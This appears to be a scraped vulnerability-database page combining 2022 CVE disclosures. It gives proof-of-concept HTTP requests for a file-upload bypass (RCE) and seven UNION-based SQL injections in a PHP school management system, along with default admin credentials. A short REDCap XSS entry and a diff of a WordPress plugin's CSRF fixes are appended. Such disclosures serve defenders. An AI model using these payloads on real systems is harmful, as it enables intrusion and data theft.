itsourcecode Advanced School Management System v1.0 is vulnerable to Arbitrary code execution via ip/school/view/all_teacher.php.

Permalink

Cannot retrieve contributors at this time

**Advanced School Management System v1.0 by itsourcecode.com has arbitrary code execution (RCE)**

**Vul\_Author**: **Zhijie Tan**

vendor: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability url: ip/school/view/all\_teacher.php(RCE vulnerability exists in "edit" function of Ip/School/view/all\_teacher.php)

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the "edit" function file picture upload point of the TEACHER module in the background management system. You can change the "php" suffix of "shell.php" to "png" to bypass the front-end detection, and then modify the "png" back to the original "php" by grabbing the Burp package. The "shell.php" file can be uploaded successfully after putting back the request packet.

Super Admin account password: suarez081119@gmail.com/12345

Request package for file upload：

POST /school/index.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/school/view/all\_teacher.php
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------12765172874523
Content-Length: 1148
\-----------------------------12765172874523
Content-Disposition: form-data; name="full\_name"
Teacher 6
\-----------------------------12765172874523
Content-Disposition: form-data; name="i\_name"
Teacher 6
\-----------------------------12765172874523
Content-Disposition: form-data; name="address"
School
\-----------------------------12765172874523
Content-Disposition: form-data; name="gender"
Male
\-----------------------------12765172874523
Content-Disposition: form-data; name="phone"
666-666-6666
\-----------------------------12765172874523
Content-Disposition: form-data; name="email"
t6@gmail.com
\-----------------------------12765172874523
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: image/jpeg
JFJF
<?php phpinfo();?>
\-----------------------------12765172874523
Content-Disposition: form-data; name="c\_page"
1
\-----------------------------12765172874523
Content-Disposition: form-data; name="id"
15
\-----------------------------12765172874523
Content-Disposition: form-data; name="do"
update\_teacher
\-----------------------------12765172874523--

The files will be uploaded to this directory \\school\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32433: bug_report/RCE-1.md at main · tamchikit/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_admin_profile.php?my_index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_admin\_profile.php?my\_index=

Vulnerability location: /school/model/get\_admin\_profile.php?my\_index=,my\_index

\[+\] Payload: /school/model/get\_admin\_profile.php?my\_index=-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> my\_index

Current database name: std\_db,length is 6

GET /school/model/get\_admin\_profile.php?my\_index\=\-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32381: bug_report/SQLi-11.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_teacher_profile.php?my_index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_teacher\_profile.php?my\_index=

Vulnerability location: /school/model/get\_teacher\_profile.php?my\_index=,my\_index

\[+\] Payload: /school/model/get\_teacher\_profile.php?my\_index=-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> my\_index

Current database name: std\_db,length is 6

GET /school/model/get\_teacher\_profile.php?my\_index\=\-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32378: bug_report/SQLi-13.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_exam_timetable.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_exam\_timetable.php?id=

Vulnerability location: /school/model/get\_exam\_timetable.php?id=,id

\[+\] Payload: /school/model/get\_exam\_timetable.php?id=-1%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_exam\_timetable.php?id\=\-1%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32377: bug_report/SQLi-9.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_parents_profile.php?my_index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_parents\_profile.php?my\_index=

Vulnerability location: /school/model/get\_parents\_profile.php?my\_index=,my\_index

\[+\] Payload: /school/model/get\_parents\_profile.php?my\_index=-1'%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13,14,15--+ // Leak place ---> my\_index

Current database name: std\_db,length is 6

GET /school/model/get\_parents\_profile.php?my\_index\=\-1'%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13,14,15--+ HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32379: bug_report/SQLi-10.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_events.php?event_id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_events.php?event\_id=

Vulnerability location: /school/model/get\_events.php?event\_id=,id

\[+\] Payload: /school/model/get\_events.php?event\_id=-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_events.php?event\_id\=\-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32376: bug_report/SQLi-8.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_student_subject.php?index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_student\_subject.php?index=

Vulnerability location: /school/model/get\_student\_subject.php?index=,index

\[+\] Payload: /school/model/get\_student\_subject.php?index=-1%20union%20select%201,2,3,database(),5,6--+ // Leak place ---> index

Current database name: std\_db,length is 6

GET /school/model/get\_student\_subject.php?index\=\-1%20union%20select%201,2,3,database(),5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32380: bug_report/SQLi-12.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_timetable.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_timetable.php?id=

Vulnerability location: /school/model/get\_timetable.php?id=,id

\[+\] Payload: /school/model/get\_timetable.php?id=-42%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_timetable.php?id\=\-42%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32375: bug_report/SQLi-6.md at main · k0xx11/bug_report

A Stored Cross-Site Scripting (XSS) vulnerability was discovered in ProjectGeneral/edit_project_settings.php in REDCap 12.0.11. This issue allows any user with project management permissions to inject arbitrary code into the project title (app_title) field when editing an existing project. The payload is then reflected within the title tag of the page.

CVE-2022-24127: REDCap Change Log - Eastern Virginia Medical School (EVMS), Norfolk, Hampton Roads

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Admin Management Xtended plugin <= 2.4.4 at WordPress.



Expand Up @@ -8,7 +8,7 @@ \*/  
/\* \* Copyright 2008-2020 Oliver Schlöbe (email : scripts@schloebe.de) \* Copyright 2008-2022 Oliver Schlöbe (email : scripts@schloebe.de) \* \* This program is free software; you can redistribute it and/or modify \* it under the terms of the GNU General Public License as published by Expand Down Expand Up @@ -71,6 +71,8 @@ function return\_function($output) { \*/ function ame\_ajax\_save\_mediadesc() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $new\_mediadesc = $\_POST\['new\_mediadesc'\];  
Expand All @@ -96,6 +98,8 @@ function ame\_ajax\_save\_mediadesc() { \*/ function ame\_ajax\_set\_commentstatus() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $q\_status = intval( $\_POST\['comment\_status'\] );  
Expand Down Expand Up @@ -127,6 +131,7 @@ function ame\_ajax\_set\_commentstatus() { \*/ function ame\_get\_pageorder() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
if( !current\_user\_can( 'edit\_pages' ) ) { die(); Expand Down Expand Up @@ -155,6 +160,8 @@ function ame\_get\_pageorder() { \*/ function ame\_ajax\_save\_tags() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $ame\_tags = $\_POST\['new\_tags'\];  
Expand Down Expand Up @@ -200,6 +207,8 @@ function ame\_ajax\_save\_tags() { \*/ function ame\_ajax\_get\_categories() { global $wpdb, $post; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$ame\_id = intval( $\_POST\['postid'\] );  
if( !current\_user\_can( 'edit\_post', $ame\_id ) ) { Expand Down Expand Up @@ -232,6 +241,8 @@ function ame\_ajax\_get\_categories() { \*/ function ame\_ajax\_save\_categories() { global $wpdb, $post; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $ame\_cats = $\_POST\['ame\_cats'\];  
Expand Down Expand Up @@ -272,6 +283,8 @@ function ame\_ajax\_save\_categories() { \*/ function ame\_toggle\_showinvisposts() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$status = intval( $\_POST\['status'\] );  
update\_option( "ame\_toggle\_showinvisposts", $status ); Expand Down Expand Up @@ -300,6 +313,8 @@ function ame\_ajax\_toggle\_imageset() { \*/ function ame\_toggle\_orderoptions() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$status = intval( $\_POST\['status'\] );  
update\_option( "ame\_show\_orderoptions", $status ); Expand All @@ -314,6 +329,8 @@ function ame\_toggle\_orderoptions() { \*/ function ame\_slug\_edit() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] ); if( is\_string( $\_POST\['posttype'\] ) ) $posttype = $\_POST\['posttype'\];  
Expand Down Expand Up @@ -342,6 +359,8 @@ function ame\_slug\_edit() { \*/ function ame\_author\_edit() { global $wpdb, $current\_user; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['post\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -396,6 +415,8 @@ function ame\_author\_edit() { \*/ function ame\_save\_order() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] ); $neworderid = intval( $\_POST\['new\_orderid'\] );  
Expand All @@ -416,6 +437,8 @@ function ame\_save\_order() { \*/ function ame\_save\_slug() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -451,6 +474,8 @@ function ame\_save\_slug() { \*/ function ame\_save\_author() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -480,6 +505,8 @@ function ame\_save\_author() { \*/ function ame\_save\_title() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] ); $new\_title = $\_POST\['new\_title'\]; $new\_title = apply\_filters( 'the\_title', $new\_title ); Expand All @@ -504,6 +531,8 @@ function ame\_save\_title() { \*/ function ame\_set\_date() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( substr( $\_POST\['category\_id'\], 10, 5 ) );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -542,6 +571,8 @@ function ame\_set\_date() { \*/ function ame\_toggle\_visibility() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -584,6 +615,8 @@ function ame\_toggle\_visibility() { \*/ function ame\_toggle\_sticky() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['post\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -612,6 +645,8 @@ function ame\_toggle\_sticky() { \* @link http://plugins.trac.wordpress.org/browser/exclude-pages/trunk/exclude\_pages.php#L162 \*/ function ame\_toggle\_excludestatus() { check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
if( !current\_user\_can( 'edit\_pages' ) ) { die(); return; Expand Down Expand Up @@ -955,9 +990,20 @@ function ame\_enqueue\_stuff\_edit() { wp\_enqueue\_script( 'ame\_gui-modificators', AME\_PLUGINFULLURL . "js/gui-modificators.js", array( 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'sack' ), AME\_VERSION ); wp\_register\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'jquery', 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts' ); wp\_localize\_script( 'ame\_miscscripts', 'ameAjaxSec', array( 'ajaxnonce' => wp\_create\_nonce( 'ame\_ajax\_validation' ) ) ); }  
add\_action( 'admin\_head', 'ame\_css\_admin\_header' ); Expand Down Expand Up @@ -1000,9 +1046,20 @@ function ame\_enqueue\_stuff\_linkmanager() { wp\_enqueue\_script( 'ame\_gui-modificators', AME\_PLUGINFULLURL . "js/gui-modificators.js", array( 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'sack' ), AME\_VERSION ); wp\_register\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'jquery', 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts' ); wp\_localize\_script( 'ame\_miscscripts', 'ameAjaxSec', array( 'ajaxnonce' => wp\_create\_nonce( 'ame\_ajax\_validation' ) ) ); }  
add\_action( 'admin\_print\_scripts', 'ame\_js\_admin\_header' ); Expand All @@ -1015,9 +1072,20 @@ function ame\_enqueue\_stuff\_upload() { wp\_enqueue\_script( 'ame\_gui-modificators', AME\_PLUGINFULLURL . "js/gui-modificators.js", array( 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'sack' ), AME\_VERSION ); wp\_register\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'jquery', 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts' ); wp\_localize\_script( 'ame\_miscscripts', 'ameAjaxSec', array( 'ajaxnonce' => wp\_create\_nonce( 'ame\_ajax\_validation' ) ) ); }  
add\_action( 'admin\_print\_scripts', 'ame\_js\_admin\_header' ); Expand Down

Tag

#php